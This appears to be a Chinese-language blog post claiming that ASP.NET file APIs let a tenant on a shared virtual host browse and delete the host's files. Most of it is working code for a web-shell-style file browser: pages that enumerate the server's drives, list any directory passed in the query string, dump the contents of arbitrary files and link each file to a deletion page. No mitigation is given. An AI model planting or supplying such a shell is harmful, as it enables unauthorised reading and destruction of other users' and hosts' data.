.net的檔案操作存在巨大的安全隱患,寫了幾個檔案傳到虛擬機器主機上,不但可以看到主機上的檔案,甚至還可以進行刪除等一系列的檔案操作
得的磁碟機目錄
getit.aspx.cs
string[] drivers=Directory.GetLogicalDrives();
int NumOfDriver=drivers.Length;
for(int i=0;i<NumOfDriver;i++)
{
Response.Write("<a href=listdir.aspx?dir=" + Server.UrlEncode(drivers[i]) + ">" + drivers[i] + "</a><br>");
}
listdir.aspx.cs獲得檔案
string strDir=Request.QueryString.Get("dir");
try
{
DirectoryInfo theDir=new DirectoryInfo(strDir);
Response.Write(strDir + " 建立時間:" + theDir.CreationTime.ToString() + "<br>");
//獲得子目錄
DirectoryInfo[] subDir=theDir.GetDirectories();
Response.Write("檔案夾");
for(int i=0;i<subDir.Length;i++)
{
Response.Write("<br><a href=listdir.aspx?dir=" + Server.UrlEncode(subDir[i].FullName) + ">" + subDir[i].FullName + "</a>");
}
Response.Write("<br>");
//獲得檔案
Response.Write("檔案");
FileInfo[] theFiles=theDir.GetFiles();
for(int i=0;i<theFiles.Length;i++)
{
Response.Write("<br><a href=showfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">" +theFiles[i].FullName + "</a>");
Response.Write(" <a href=delfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">刪除</a>");
}
}
catch(Exception ex)
{
Response.Write(ex.ToString());
}
showfile.aspx.cs讀取檔案資訊
string strFile=Request.QueryString.Get("file");
FileInfo file=new FileInfo(strFile);
Response.Write("<br>");
Response.Write("<br>名稱:" + file.Name);
Response.Write("<br>路徑:" + file.FullName);
Response.Write("<br>目前的目錄:" + file.Directory);
Response.Write("<br>建立時間:" + file.CreationTime.ToString());
Response.Write("<br>大小:" + file.Length.ToString() + "Bytes");
Response.Write("<br>上次訪問時間:" + file.LastAccessTime.ToString());
Response.Write("<br>上次修改時間:" + file.LastWriteTime.ToString());
Response.Write("<br>");
Response.Write("Open with text(讀取一定數量字元)" + "<br>");
StreamReader reader=file.OpenText();
char[] buffer=new char[255];
int nRead=reader.ReadBlock(buffer,0,255);
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(new String(buffer,0,nRead)));
Response.Write("</pre>");